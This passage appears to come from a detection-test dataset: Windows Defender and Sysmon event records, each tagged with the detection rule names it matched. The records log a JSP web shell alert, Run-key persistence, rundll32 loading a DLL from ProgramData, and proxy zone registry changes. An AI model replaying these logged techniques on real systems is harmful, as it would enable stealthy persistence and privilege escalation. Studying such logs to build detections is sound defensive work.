Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"containerfile:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0068)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"},"EventID":1116,"EventRecordID":102,"Execution_attributes":{"ProcessID":6024,"ThreadID":6068},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows 
Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:51:50.798994Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer","New RUN Key Pointing to Suspicious Folder","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Tendyron","UtcTime":"2020-10-15 13:17:02.706"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":416056,"Execution_attributes":{"ProcessID":3368,"ThreadID":4748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.736849Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=F359D3C074135BBCA9A4C98A6B6544690EDAE93D,MD5=02825976B19F123872914C233CF309BB,SHA256=0DD700BB6A992FFD40B0D2B41FC5875CD3B319A7079F67B3DC37428B5005B354,IMPHASH=45D79E943E6D34075123B434B5AE3DEB","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\OnKeyToken_KEB.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-15 13:17:02.659"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":416061,"Execution_attributes":{"ProcessID":3368,"ThreadID":4756},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.963417Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.734","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\__tmp_rar_sfx_access_check_2914968","UtcTime":"2020-10-23 
21:57:34.734"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423992,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.745175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.751","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\d948","UtcTime":"2020-10-23 21:57:34.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423993,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.767786Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using 
.NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:22:14.491","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\sduchxll.tmp","UtcTime":"2020-10-23 21:57:36.328"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424049,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.332819Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424060,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375368Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424061,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375422Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424062,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375487Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424063,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375545Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424064,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376024Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424065,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376053Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424066,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424067,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376099Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:57:36.406"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424078,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.417723Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1216,"ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.171"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424081,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.176847Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\Rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:17.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424114,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.542300Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ParentProcessId":7552,"ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.542"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424115,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.543407Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:21.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424174,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.693498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 
21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424244,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930237Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424245,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930339Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424246,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930392Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 
